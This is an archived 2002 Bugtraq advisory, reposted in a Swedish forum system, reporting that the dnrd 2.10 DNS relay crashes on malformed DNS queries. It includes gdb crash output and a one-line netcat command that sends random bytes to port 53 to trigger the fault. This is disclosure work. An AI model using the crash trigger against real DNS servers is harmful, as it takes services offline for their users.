linux, säkerhet

7858528 2002-01-20 20:15 +1100  /77 rader/ Andrew Griffiths <andrewg@tasmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-22  01:14  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20611>
Ärende: dnrd 2.10 dos
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201200915.g0K9FRT13130@franklin.nt.tas.gov.au>

Program: dnrd
Version: 2.10
Distro: n/a

Problem:

There are various problems with dnrd's dns request and reply
functions, that cause it to crash.

Reproduce:

Using two consoles, I did the following

Terminal one got:

[andrewg@blackhole /data/audit/dnrd-2.10/src]$ gdb dnrd GNU gdb
5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation,
Inc.  GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of
it under certain conditions.  Type "show copying" to see the
conditions.  There is absolutely no warranty for GDB.  Type "show
warranty" for details.  This GDB was configured as
"i386-redhat-linux".  (gdb) set arg -s 1.2.3.4 -d (gdb) run Starting
program: /data/audit/dnrd-2.10/src/dnrd -d [New Thread 1024 (LWP
3249)] ERROR: Couldn't kill dnrd: No such process Debug: cache
low/high: 800/1000 Debug: initialising master DNS database Debug: no
master configuration: /etc/dnrd/master Debug: initialising from
/etc/hosts, domain= <none> Debug: /etc/hosts: 3 records Debug:
Received DNS query for "..\SÖanx, 6h??ü-ÀC?Ï"?>" real ?
"?????£æ??@ÖwéÕËl?p?Û@??"

Program received signal SIGSEGV, Segmentation fault.  [Switching to
Thread 1024 (LWP 3249)] parse_query (y=0xbffff140, msg=0xb4bffff7
<Address 0xb4bffff7 out of bounds>,
    len=1346377321) at dns.c:298
298         if (ntohs(((short int *) msg)[2]) == 0) {       /* C is nice. */

Note that the ? are various control charatchers that I couldn't paste
in, 'cause they are not printable and kept stuffing up vim.

While one terminal two, I did:

dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1

At one stage I also had msg=0x2e2e2e2e <Address 0x2e2e2e2e out of
bounds>.

It's not just parse_query that has this problem, but also places like
get_objectname()


Exploit:
-=-=-=-=-

So far I haven't tried to exploit it, but given some of the stuff
that I've seen, I would not be surprised if it was.

Even if their was an exploit, it'd have to work out a way of getting
root in a chroot jail and a non-root acct.

Affected:
-=-=-=-=-

People who use this, or distro's that do, such as smoothwall. :P


--
www.tasmail.com
(7858528) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)